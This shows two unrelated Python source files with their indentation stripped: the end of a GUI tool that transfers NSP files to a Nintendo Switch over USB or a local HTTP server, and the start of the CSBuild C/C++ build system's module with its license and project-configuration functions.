gold_in = usb.util.find_descriptor(cfg[(0,0)], custom_match=is_in_ep)
assert gold_out is not None
assert gold_in is not None
set_cur_nsp(os.path.basename(file))
Goldleaf.nsp_path = str(file)
Goldleaf.Goldleaf_USB()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
throw_error(0)
try:
usb.util.dispose_resources(dev)
dev.reset()
except:
pass
sys.exit()
usb.util.dispose_resources(dev)
dev.reset()
sys.exit()
# Tinfoil Network
netrlist = []
def reset_netrlist():
global netrlist
netrlist = None
netrlist = []
def append_netrlist(v, v2):
global netrlist
netrlist.append((v, v2))
class RangeHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_head(self):
for s in range(len(netrlist)):
if netrlist[s][0] == str(self.path)[1:]:
path = netrlist[s][1]
ctype = self.guess_type(path)
if os.path.isdir(path):
return SimpleHTTPRequestHandler.send_head(self)
if not os.path.exists(path):
return self.send_error(404, self.responses.get(404)[0])
f = open(path, 'rb')
fs = os.fstat(f.fileno())
size = fs[6]
start, end = 0, size - 1
if 'Range' in self.headers:
start, end = self.headers.get('Range').strip().strip('bytes=')\
.split('-')
if start == "":
try:
end = int(end)
except ValueError as e:
self.send_error(400, 'invalid range')
start = size - end
else:
try:
start = int(start)
except ValueError as e:
self.send_error(400, 'invalid range')
if start >= size:
self.send_error(416, self.responses.get(416)[0])
if end == "":
end = size - 1
else:
try:
end = int(end)
except ValueError as e:
self.send_error(400, 'invalid range')
start = max(start, 0)
end = min(end, size - 1)
self.range = (start, end)
cont_length = end - start + 1
if 'Range' in self.headers:
self.send_response(206)
else:
self.send_response(200)
self.send_header('Content-type', ctype)
self.send_header('Accept-Ranges', 'bytes')
self.send_header('Content-Range',
'bytes %s-%s/%s' % (start, end, size))
self.send_header('Content-Length', str(cont_length))
self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
self.end_headers()
return f
def copyfile(self, infile, outfile):
if 'Range' not in self.headers:
SimpleHTTPRequestHandler.copyfile(self, infile, outfile)
return
complete_loading()
set_cur_nsp(str(os.path.basename(infile.name)))
start, end = self.range
infile.seek(start)
bufsize = 64 * 1024 # 64KB
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
buf = infile.read(bufsize)
if not buf:
break
try:
outfile.write(buf)
try:
set_progress(int(infile.tell()), int(end))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(int(infile.tell()) - last_transfer_rate)
set_last_transfer_rate(int(infile.tell()))
set_start_time()
except:
pass
except BrokenPipeError:
pass
class MyServer(TCPServer):
stopped = False
def server_bind(self):
import socket
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def serve_forever(self):
while not self.stopped:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
self.handle_request()
def force_stop(self):
self.server_close()
self.stopped = True
sys.exit()
def init_tinfoil_net_install():
reset_netrlist()
accepted_extension = ('.nsp')
hostPort = random.randint(26490,26999)
target_ip = switch_ip
hostIp = host_ip
target_path = str(selected_dir).strip()
baseUrl = hostIp + ':' + str(hostPort) + '/'
directory = target_path
file_list_payload = ''
for file in [file for file in next(os.walk(target_path))[2] if file.endswith(accepted_extension)]:
for y in selected_files:
if str(file).find(os.path.basename(y)) != -1:
n = random.randint(1,10000000)
fake_file = str(n) + ".nsp"
append_netrlist(fake_file, str(y))
file_list_payload += baseUrl + fake_file + '\n'
file_list_payloadBytes = file_list_payload.encode('ascii')
if directory and directory != '.':
os.chdir(directory)
server = MyServer((host_ip, hostPort), RangeHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, 2000))
sock.sendall(struct.pack('!L', len(file_list_payloadBytes)) + file_list_payloadBytes)
while len(sock.recv(1)) < 1:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
sock.close()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
server.force_stop()
throw_error(1)
sys.exit(1)
complete_install()
server.force_stop()
try:
server.shutdown()
except:
pass
sys.exit()
# Tinfoil USB
class Tinfoil:
@staticmethod
def send_response_header(out_ep, cmd_id, data_size):
out_ep.write(b'TUC0')
out_ep.write(struct.pack('<B', CMD_TYPE_RESPONSE))
out_ep.write(b'\x00' * 3)
out_ep.write(struct.pack('<I', cmd_id))
out_ep.write(struct.pack('<Q', data_size))
out_ep.write(b'\x00' * 0xC)
@staticmethod
def file_range_cmd(nsp_dir, in_ep, out_ep, data_size):
file_range_header = in_ep.read(0x20)
range_size = struct.unpack('<Q', file_range_header[:8])[0]
range_offset = struct.unpack('<Q', file_range_header[8:16])[0]
nsp_name_len = struct.unpack('<Q', file_range_header[16:24])[0]
nsp_name = bytes(in_ep.read(nsp_name_len)).decode('utf-8')
set_cur_nsp(str(os.path.basename(nsp_name)))
Tinfoil.send_response_header(out_ep, CMD_ID_FILE_RANGE, range_size)
with open(nsp_name, 'rb') as f:
complete_loading()
f.seek(range_offset)
curr_off = 0x0
end_off = range_size
read_size = transfer_rate
while curr_off < end_off:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
if curr_off + read_size >= end_off:
read_size = end_off - curr_off
try:
set_progress(int(end_off), int(end_off))
except:
pass
buf = f.read(read_size)
out_ep.write(data=buf, timeout=0)
curr_off += read_size
try:
set_progress(int(curr_off), int(end_off))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(curr_off - last_transfer_rate)
set_last_transfer_rate(curr_off)
set_start_time()
except:
pass
@staticmethod
def poll_commands(nsp_dir, in_ep, out_ep):
while True:
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
cmd_header = bytes(in_ep.read(0x20, timeout=0))
magic = cmd_header[:4]
if magic != b'TUC0':
continue
cmd_type = struct.unpack('<B', cmd_header[4:5])[0]
cmd_id = struct.unpack('<I', cmd_header[8:12])[0]
data_size = struct.unpack('<Q', cmd_header[12:20])[0]
if cmd_id == CMD_ID_EXIT:
complete_install()
sys.exit()
elif cmd_id == CMD_ID_FILE_RANGE:
Tinfoil.file_range_cmd(nsp_dir, in_ep, out_ep, data_size)
@staticmethod
def send_nsp_list(s_f, nsp_dir, out_ep):
nsp_path_list = list()
nsp_path_list_len = 0
for nsp_path in os.listdir(nsp_dir):
if nsp_path.endswith(".nsp"):
for y in s_f:
if str(nsp_path).find(os.path.basename(y)) != -1:
print(str(nsp_path))
nsp_path_list.append(nsp_dir + "/" + nsp_path.__str__() + '\n')
nsp_path_list_len += len(nsp_dir + "/" + nsp_path.__str__()) + 1
out_ep.write(b'TUL0')
out_ep.write(struct.pack('<I', nsp_path_list_len))
out_ep.write(b'\x00' * 0x8)
for nsp_path in nsp_path_list:
out_ep.write(nsp_path)
def init_tinfoil_usb_install():
try:
nsp_dir = selected_dir
dev = usb.core.find(idVendor=0x057E, idProduct=0x3000)
dev.reset()
dev.set_configuration()
cfg = dev.get_active_configuration()
is_out_ep = lambda ep: usb.util.endpoint_direction(ep.bEndpointAddress) == usb.util.ENDPOINT_OUT
is_in_ep = lambda ep: usb.util.endpoint_direction(ep.bEndpointAddress) == usb.util.ENDPOINT_IN
out_ep = usb.util.find_descriptor(cfg[(0,0)], custom_match=is_out_ep)
in_ep = usb.util.find_descriptor(cfg[(0,0)], custom_match=is_in_ep)
assert out_ep is not None
assert in_ep is not None
Tinfoil.send_nsp_list(selected_files, nsp_dir, out_ep)
Tinfoil.poll_commands(nsp_dir, in_ep, out_ep)
complete_install()
sys.exit()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
throw_error(2)
sys.exit()
pass
# Main
try:
# Images
iconpixmap.loadFromData(base64.b64decode(ICON_DATA))
inlaypixmap.loadFromData(base64.b64decode(DONUT_DATA))
dinlaypixmap.loadFromData(base64.b64decode(DARK_DONUT_DATA))
# Widget Functions
def send_header_cmd():
if not sent_header:
btn_header.setEnabled(False)
btn_nsp.setEnabled(False)
combo.setEnabled(False)
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
net_radio.setEnabled(False)
usb_radio.setEnabled(False)
txt_port.setEnabled(False)
tin_radio.setEnabled(False)
gold_radio.setEnabled(False)
window.menuBar().setEnabled(False)
if combo.currentText() == Language.CurrentDict[5]:
set_transfer_rate(1)
elif combo.currentText() == Language.CurrentDict[6]:
set_transfer_rate(0)
if is_network:
set_ip(txt_ip.text(), 0)
set_ip(txt_ip2.text(), 1)
set_port(txt_port.text())
set_sent_header()
set_start_time()
threading.Thread(target = init_tinfoil_net_install).start()
else:
if is_goldleaf:
set_sent_header()
set_start_time()
threading.Thread(target = init_goldleaf_usb_install).start()
else:
set_sent_header()
set_start_time()
threading.Thread(target = init_tinfoil_usb_install).start()
else:
reset_install()
def nsp_file_dialog():
try:
if not is_goldleaf:
d = filedialog.askopenfilenames(parent=root,title=Language.CurrentDict[13],filetypes=[("NSP files", "*.nsp")])
else:
d = filedialog.askopenfilename(parent=root,title=Language.CurrentDict[13],filetypes=[("NSP files", "*.nsp")])
tmp = list()
list_nsp.clear()
i = 0
if not is_goldleaf:
file_list = list(d)
for f in file_list:
if str(f).endswith(".nsp"):
i += 1
list_nsp.addItem(os.path.basename(str(f)))
tmp.append(f)
else:
tmp.append(str(d))
list_nsp.addItem(os.path.basename(str(d)))
i+=1
if i > 0:
btn_header.setEnabled(True)
set_total_nsp(i)
set_dir(os.path.dirname(tmp[0]))
set_selected_files(tmp)
l_status.setText(str(total_nsp) + " " + Language.CurrentDict[14])
else:
btn_header.setEnabled(False)
l_status.setText(Language.CurrentDict[9])
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
pass
def dark_mode_cmd():
if dark_check.isChecked():
try:
set_dark_mode(0)
except:
dark_check.setChecked(False)
pass
else:
set_dark_mode(1)
def tin_radio_cmd():
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port.setEnabled(False)
net_radio.setChecked(False)
usb_radio.setChecked(True)
net_radio.setVisible(True)
set_goldleaf(False)
split_check.setEnabled(True)
def gold_radio_cmd():
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port.setEnabled(False)
net_radio.setChecked(False)
usb_radio.setChecked(True)
net_radio.setVisible(False)
set_network(False)
set_goldleaf(True)
split_check.setCheckState(False)
split_check.setEnabled(False)
list_nsp.clear()
def usb_radio_cmd():
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
combo.setEnabled(True)
set_network(False)
txt_port.setEnabled(False)
split_check.setEnabled(True)
def net_radio_cmd():
txt_ip.setEnabled(True)
txt_ip2.setEnabled(True)
combo.setEnabled(False)
set_network(True)
txt_port.setEnabled(True)
split_check.setCheckState(False)
split_check.setEnabled(False)
#Unused
def split_cmd():
if split_check.checkState():
btn_nsp.setText("Select Folder")
else:
btn_nsp.setText("NSP Selection")
def set_done_text():
tmp_string = str(total_nsp)
reset_install()
l_nsp.setText(Language.CurrentDict[8] + " " + tmp_string + " NSP(s)!")
def set_loading_text():
l_nsp.setText("")
l_status.setText("")
l_switch.setText(str(total_nsp) + " " + Language.CurrentDict[26] + ".")
l_switch.setStyleSheet(PURPLE)
def set_progress_text():
v = (int(cur_progress) / int(end_progress)) * 100
progressbar.setValue(v)
n_rate = round((cur_transfer_rate /1000000),2)
if n_rate < 0:
n_rate = 0.0
if not is_goldleaf:
l_status.setText(Language.CurrentDict[27] + " " + str(cur_nsp_count) + " / " + str(total_nsp) + " NSP(s).")
else:
l_status.setText(Language.CurrentDict[27] + " " + str(cur_nca_count) + " / " + str(max_nca_count) + " NCAs.")
l_switch.setText(Language.CurrentDict[28] + ": " + str(n_rate) + "MB/s.")
l_switch.setStyleSheet(GREEN)
l_status.setStyleSheet(GREEN)
if not is_goldleaf:
if len(cur_nsp_name) > 13:
l_nsp.setText(Language.CurrentDict[7] + ": \"" + cur_nsp_name[:13] + "...\"")
else:
l_nsp.setText(Language.CurrentDict[7] + ": \"" + cur_nsp_name + "\"")
else:
if len(cur_nca_name) > 13:
l_nsp.setText(Language.CurrentDict[29] + ": \"..." + cur_nca_name[-13:] + "\"")
else:
l_nsp.setText(Language.CurrentDict[29] + ": \"" + cur_nca_name + "\"")
def set_switch_text():
dev = usb.core.find(idVendor=0x057E, idProduct=0x3000)
if dev is None:
l_switch.setText(Language.CurrentDict[10]+"!")
btn_header.setEnabled(False)
l_switch.setStyleSheet(RED)
else:
l_switch.setText(Language.CurrentDict[11]+"!")
l_switch.setStyleSheet(GREEN)
if list_nsp.count() > 0:
btn_header.setEnabled(True)
else:
btn_header.setEnabled(False)
#Init Widgets
l_host = QtWidgets.QLabel(Language.CurrentDict[3]+":")
txt_ip2 = QtWidgets.QLineEdit("0.0.0.0")
try:
fill = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
txt_ip2.setText(str(fill))
except:
pass
l_nsp = QtWidgets.QLabel("")
l_ip = QtWidgets.QLabel(Language.CurrentDict[2]+":")
l_port = QtWidgets.QLabel("Port:")
txt_ip = QtWidgets.QLineEdit("0.0.0.0")
tin_radio = QtWidgets.QRadioButton("Tinfoil")
gold_radio = QtWidgets.QRadioButton("Goldleaf")
split_check = QtWidgets.QCheckBox("Use Split NSP")
dark_check = QtWidgets.QCheckBox(Language.CurrentDict[20])
usb_radio = QtWidgets.QRadioButton("USB")
net_radio = QtWidgets.QRadioButton(Language.CurrentDict[24])
btn_nsp = QtWidgets.QPushButton(Language.CurrentDict[13])
btn_header = QtWidgets.QPushButton(Language.CurrentDict[1])
l_rate = QtWidgets.QLabel(Language.CurrentDict[4])
l_github = QtWidgets.QLabel("v" + VERSION)
l_status = QtWidgets.QLabel(Language.CurrentDict[9]+".")
l_switch = QtWidgets.QLabel(Language.CurrentDict[10]+"!")
list_nsp = QtWidgets.QListWidget()
combo = QComboBox()
#Set Widgets
try:
txt_ip.setText(switch_ip)
except:
txt_ip.setText("0.0.0.0")
pass
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port = QtWidgets.QLineEdit("2000")
txt_port.setEnabled(False)
h_box = QtWidgets.QHBoxLayout()
h2_box = QtWidgets.QHBoxLayout()
h3_box = QtWidgets.QHBoxLayout()
h3_box.addWidget(dark_check)
h3_box.addStretch()
h3_box.addWidget(l_github)
h_group = QtWidgets.QButtonGroup()
combo.addItem(Language.CurrentDict[6])
combo.addItem(Language.CurrentDict[5])
combo.setCurrentIndex(1)
tin_radio.setChecked(True)
tin_radio.toggled.connect(tin_radio_cmd)
gold_radio.setChecked(False)
gold_radio.toggled.connect(gold_radio_cmd)
h_group.addButton(tin_radio)
h_group.addButton(gold_radio)
h2_box.addWidget(tin_radio)
h2_box.addWidget(gold_radio)
split_check.stateChanged.connect(split_cmd)
dark_check.stateChanged.connect(dark_mode_cmd)
usb_radio.setChecked(True)
usb_radio.toggled.connect(usb_radio_cmd)
h_box.addWidget(usb_radio)
net_radio.toggled.connect(net_radio_cmd)
h_box.addWidget(net_radio)
btn_header.setEnabled(False)
progressbar = QProgressBar()
progressbar.setAlignment(Qt.AlignVCenter)
progressbar.setMaximum(100)
v_box = QtWidgets.QVBoxLayout()
img_label = QLabel()
img_label.setAlignment(Qt.AlignCenter)
# Language Init
def init_language():
l_nsp.setText("")
l_status.setText(Language.CurrentDict[9]+".")
l_switch.setText(Language.CurrentDict[10]+"!")
l_ip.setText(Language.CurrentDict[2]+":")
dark_check.setText(Language.CurrentDict[20])
net_radio.setText(Language.CurrentDict[24])
btn_nsp.setText(Language.CurrentDict[13])
btn_header.setText(Language.CurrentDict[1])
l_rate.setText(Language.CurrentDict[4])
combo.clear()
combo.SelectedIndex = 0
combo.addItem(Language.CurrentDict[5])
combo.addItem(Language.CurrentDict[6])
l_host.setText(Language.CurrentDict[3]+":")
lang_menu.setTitle(Language.CurrentDict[22])
#git_menu.setTitle(Language.CurrentDict[23])
window.setWindowTitle(Language.CurrentDict[0])
# Menu Bar
def lang_menu_cmd():
new_lang = None
ai = 0
for action in lang_menu.actions():
if action.isChecked():
if ai != language:
set_language(ai)
init_language()
ai+=1
lang_menu = window.menuBar().addMenu(Language.CurrentDict[22])
#opt_menu = window.menuBar().addMenu(Language.CurrentDict[21])
#git_menu = window.menuBar().addMenu(Language.CurrentDict[23])
lang_group = QActionGroup(lang_menu)
lang_group.setExclusive(True)
lang_group.addAction(QAction('English',lang_group,checkable=True))
lang_group.addAction(QAction('中文',lang_group,checkable=True))
lang_group.addAction(QAction('Tiếng Việt',lang_group,checkable=True))
lang_group.addAction(QAction('Türkçe',lang_group,checkable=True))
lang_group.addAction(QAction('Português Brasileiro',lang_group,checkable=True))
lang_group.addAction(QAction('Italiano',lang_group,checkable=True))
lang_group.addAction(QAction('Français',lang_group,checkable=True))
lang_group.addAction(QAction('Español',lang_group,checkable=True))
lang_group.addAction(QAction('Deutsch',lang_group,checkable=True))
lang_menu.addActions(lang_group.actions())
lang_group.triggered.connect(lang_menu_cmd)
#opt_menu.triggered.connect(opt_menu_cmd)
#git_menu.triggered.connect(git_menu_cmd)
# Set Language
aix = 0
for action in lang_menu.actions():
if aix == language:
action.setChecked(True)
aix+=1
init_language()
# Occupy VBOX
v_box.addLayout(h2_box)
v_box.addWidget(img_label)
v_box.addStretch()
v_box.addLayout(h_box)
v_box.addWidget(l_ip)
v_box.addWidget(txt_ip)
v_box.addWidget(l_host)
v_box.addWidget(txt_ip2)
#v_box.addWidget(l_port)
#v_box.addWidget(txt_port)
v_box.addWidget(l_rate)
v_box.addWidget(combo)
#v_box.addWidget(split_check)
v_box.addWidget(btn_nsp)
v_box.addWidget(btn_header)
v_box.addWidget(l_nsp)
v_box.addWidget(l_status)
v_box.addWidget(l_switch)
v_box.addWidget(progressbar)
v_box.addWidget(list_nsp)
v_box.addLayout(h3_box)
window.setCentralWidget(QWidget(window))
window.centralWidget().setLayout(v_box)
window.setWindowTitle(Language.CurrentDict[0])
btn_nsp.clicked.connect(nsp_file_dialog)
btn_header.clicked.connect(send_header_cmd)
window.setWindowIcon(QIcon(iconpixmap))
window.show()
# Revert to network mode
if not usb_success:
net_radio_cmd()
net_radio.setChecked(True)
usb_radio.setVisible(False)
l_rate.setVisible(False)
combo.setVisible(False)
gold_radio.setVisible(False)
l_switch.setText(Language.CurrentDict[12])
l_switch.setStyleSheet(BLUE)
if dark_mode == 0:
try:
set_dark_mode(0)
dark_check.setChecked(True)
except:
set_dark_mode(1)
dark_check.setChecked(False)
pass
else:
set_dark_mode(1)
dark_check.setChecked(False)
# Main loop
while True:
if last_error != "NA":
msg_box = QMessageBox.critical(window, 'Error', last_error, QMessageBox.Ok)
reset_last_error()
reset_install()
if is_logging:
if os.path.isfile(initial_dir + '/fluffy.log'):
if os.path.getsize(initial_dir + '/fluffy.log') > 250000:
logging.debug("Fluffy Log: Logging size reached, turning off logging.")
turn_off_logging()
if os.path.isfile('fluffy.log'):
if os.path.getsize('fluffy.log') > 250000:
logging.debug("Fluffy Log: Logging size reached, turning off logging.")
turn_off_logging()
QApplication.processEvents()
if not window.isVisible():
try:
switch_ip = txt_ip.text()
except:
pass
close_program()
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
if is_exiting:
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
if not sent_header and not is_installing and is_network:
l_switch.setText(Language.CurrentDict[12])
l_switch.setStyleSheet(BLUE)
if list_nsp.count() > 0:
btn_header.setEnabled(True)
else:
btn_header.setEnabled(False)
if not is_installing and not is_network and usb_success and not sent_header:
set_switch_text()
# Tinfoil Network Mode
if sent_header and is_network:
try:
if is_done:
set_done_text()
else:
if is_installing:
set_progress_text()
else:
l_status.setText(Language.CurrentDict[25])
l_switch.setText(Language.CurrentDict[15])
l_switch.setStyleSheet(PURPLE)
except:
pass
if sent_header and not is_installing and not is_done:
btn_header.setEnabled(True)
btn_header.setText(Language.CurrentDict[16])
if sent_header and is_installing and not is_done:
btn_header.setEnabled(False)
# Goldleaf & Tinfoil USB Mode
if sent_header and not is_network:
try:
if is_done:
set_done_text()
else:
if is_installing:
set_progress_text()
else:
set_loading_text()
except:
pass
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
close_program()
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
|
__init__.py
|
# Copyright (C) 2013 Jaedyn K. Draper
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
.. module:: CSBuild
:synopsis: cross-platform c/c++ build system
.. moduleauthor:: Jaedyn K. Draper, Brandon M. Bare
.. attention:: To support CSBuild's operation, Python's import lock is DISABLED once CSBuild has started.
This should not be a problem for most makefiles, but if you do any threading within your makefile, take note:
anything that's imported and used by those threads should always be implemented on the main thread before that
thread's execution starts. Otherwise, CSBuild does not guarantee that the import will have completed
once that thread tries to use it. Long story short: Don't import modules within threads.
"""
import argparse
import glob
import shlex
import shutil
import signal
import math
import subprocess
import os
import sys
import threading
import time
import platform
import imp
import re
import traceback
import copy
if sys.version_info >= (3,0):
import io
StringIO = io.StringIO
else:
import cStringIO
StringIO = cStringIO.StringIO
from . import plugin_plist_generator
if sys.version_info < (3,0):
import cPickle as pickle
else:
import pickle
class ProjectType( object ):
"""
Specifies the type of project to compile
"""
Application = 0
SharedLibrary = 1
StaticLibrary = 2
LoadableModule = 3 # Only matters for Apple platforms; every other platform will interpret this as SharedLibrary.
class DebugLevel( object ):
Disabled = 0
EmbeddedSymbols = 1
ExternalSymbols = 2
ExternalSymbolsPlus = 3
class OptimizationLevel( object ):
Disabled = 0
Size = 1
Speed = 2
Max = 3
class ScopeDef( object ):
Self = 1
Intermediate = 2
Final = 4
DependentsOnly = Intermediate | Final
All = Self | Intermediate | Final
class StaticLinkMode( object ):
LinkLibs = 0
LinkIntermediateObjects = 1
class RunMode( object ):
Normal = 0
Help = 1
GenerateSolution = 2
Qualop = 3
from . import _utils
from . import toolchain
from . import toolchain_msvc
from . import toolchain_gcc
from . import toolchain_gcc_darwin
from . import toolchain_android
from . import toolchain_ios
from . import log
from . import _shared_globals
from . import projectSettings
from . import project_generator_qtcreator
from . import project_generator_slickedit
from . import project_generator_visual_studio_v2
from . import project_generator
from . import plugin
try:
from .proprietary import toolchain_ps4
from .proprietary import toolchain_wiiu
except:
pass
__author__ = "Jaedyn K. Draper, Brandon M. Bare"
__copyright__ = 'Copyright (C) 2012-2014 Jaedyn K. Draper'
__credits__ = ["Jaedyn K. Draper", "Brandon M. Bare", "Jeff Grills", "Randy Culley"]
__license__ = 'MIT'
__maintainer__ = "Jaedyn K. Draper"
__email__ = "jaedyn.csbuild-contact@jaedyn.co"
__status__ = "Development"
with open( os.path.dirname( __file__ ) + "/version", "r" ) as f:
__version__ = f.read( )
def _exitsig(sig, frame):
if sig == signal.SIGINT:
log.LOG_ERROR( "Keyboard interrupt received. Aborting build." )
else:
log.LOG_ERROR( "Received terminate signal. Aborting build." )
Exit(sig)
signal.signal( signal.SIGINT, _exitsig )
signal.signal( signal.SIGTERM, _exitsig )
# Csbuild is in Normal run mode by default.
_runMode = RunMode.Normal
def NoBuiltInTargets( ):
"""
Disable the built-in "debug" and "release" targets.
"""
if SetupDebugTarget in projectSettings.currentProject.targets["debug"]:
arr = projectSettings.currentProject.targets["debug"]
del arr[arr.index( SetupDebugTarget )]
if SetupReleaseTarget in projectSettings.currentProject.targets["release"]:
arr = projectSettings.currentProject.targets["release"]
del arr[arr.index( SetupReleaseTarget )]
def EnableOutputInstall( ):
"""
Enables installation of the compiled output file.
The default installation directory is /usr/local/lib.
"""
projectSettings.currentProject.SetValue("installOutput", True)
def EnableHeaderInstall( ):
"""
Enables installation of the project's headers.
Default target is /usr/local/include, unless the --prefix option is specified.
If --prefix is specified, the target will be *{prefix*}/include
"""
projectSettings.currentProject.SetValue("installHeaders", True)
def SetHeaderInstallSubdirectory( s ):
"""
Specifies a subdirectory of *{prefix*}/include in which to install the headers.
:type s: str
:param s: The desired subdirectory; i.e., if you specify this as "myLib", the headers will be
installed under *{prefix*}/include/myLib.
"""
projectSettings.currentProject.SetValue( "headerInstallSubdir", s)
def AddExcludeDirectories( *args ):
"""
Exclude the given directories from the project. This may be called multiple times to add additional excludes.
Directories are relative to the location of the script itself, not the specified project working directory.
:type args: an arbitrary number of strings
:param args: The list of directories to be excluded.
"""
args = list( args )
newargs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newargs.append( arg )
projectSettings.currentProject.ExtendList( "excludeDirsTemp", newargs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddExcludeFiles( *args ):
"""
Exclude the given files from the project. This may be called multiple times to add additional excludes.
Files are relative to the location of the script itself, not the specified project working directory.
:type args: an arbitrary number of strings
:param args: The list of files to be excluded.
"""
args = list( args )
newargs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newargs.append( arg )
projectSettings.currentProject.ExtendList( "excludeFilesTemp", newargs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddLibraries( *args ):
"""
When linking the project, link in the given libraries. This may be called multiple times to add additional libraries.
In the gcc toolchain, these will all be prefixed with "lib" when looking for the file to link. I.e.,
csbuild.Libraries("MyLib") will link libMyLib.so or libMyLib.a.
For compatibility, the msvc toolchain will search for the library exactly as specified, and if it can't find it,
will then search for it with the lib prefix. I.e., csbuild.Libraries("MyLib") will first search for MyLib.lib,
and if that isn't found, will then search for libMyLib.lib.
:type args: an arbitrary number of strings
:param args: The list of libraries to link in.
"""
projectSettings.currentProject.UnionSet("libraries", _utils.OrderedSet( args ))
def AddStaticLibraries( *args ):
"""
Similar to csbuild.Libraries, but forces these libraries to be linked statically.
:type args: an arbitrary number of strings
:param args: The list of libraries to link in.
"""
projectSettings.currentProject.UnionSet("staticLibraries", _utils.OrderedSet( args ))
def AddSharedLibraries( *args ):
"""
Similar to csbuild.Libraries, but forces these libraries to be linked dynamically.
:type args: an arbitrary number of strings
:param args: The list of libraries to link in.
"""
projectSettings.currentProject.UnionSet("sharedLibraries", _utils.OrderedSet( args ))
def AddFrameworks( *args ):
"""
Add frameworks for Objective-C/C++ compilations.
:type args: an arbitrary number of strings
:param args: The list of libraries to link in.
"""
projectSettings.currentProject.UnionSet("frameworks", _utils.OrderedSet( args ))
def AddIncludeDirectories( *args ):
"""
Search the given directories for include headers. This may be called multiple times to add additional directories.
Directories are relative to the location of the script itself, not the specified project working directory.
In the gcc toolchain, /usr/include and /usr/local/include (or the platform appropriate equivalents) will always
be appended to the end of this list.
:type args: an arbitrary number of strings
:param args: The list of directories to be searched.
"""
newArgs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "includeDirsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddLibraryDirectories( *args ):
"""
Search the given directories for libraries to link. This may be called multiple times to add additional directories.
Directories are relative to the location of the script itself, not the specified project working directory.
In the gcc toolchain, /usr/lib and /usr/local/lib (or the platform appropriate equivalents) will always
be appended to the end of this list.
:type args: an arbitrary number of strings
:param args: The list of directories to be searched.
"""
newArgs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "libraryDirsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddFrameworkDirectories( *args ):
"""
Search the given directories for framworks to link. This may be called multiple times to add additional directories.
Directories are relative to the location of the script itself, not the specified project working directory.
:type args: an arbitrary number of strings
:param args: The list of directories to be searched.
"""
newArgs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "frameworkDirsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddAppleStoryboardFiles( *args ):
"""
DEPRECATED - This will be removed when tool plugins are able to register file extensions.
Add a list of storyboard files to be compiled. Only applies to builds for Apple platforms.
:param args: List of storyboard files.
:type args: And arbitrary number of strings.
"""
projectSettings.currentProject.UnionSet( "storyboardFiles", _utils.OrderedSet( args ) )
def AddAppleInterfaceFiles( *args ):
"""
DEPRECATED - This will be removed when tool plugins are able to register file extensions.
Add a list of interface files to be compiled. Only applies to builds for Apple platforms.
:param args: List of interface files.
:type args: And arbitrary number of strings.
"""
projectSettings.currentProject.UnionSet( "interfaceFiles", _utils.OrderedSet( args ) )
def AddAppleAssetCatalogs( *args ):
"""
DEPRECATED - This will be removed when tool plugins are able to register file extensions.
Add a list of asset catalogs to be compiled. Only applies to builds for Apple platforms.
:param args: List of asset catalogs.
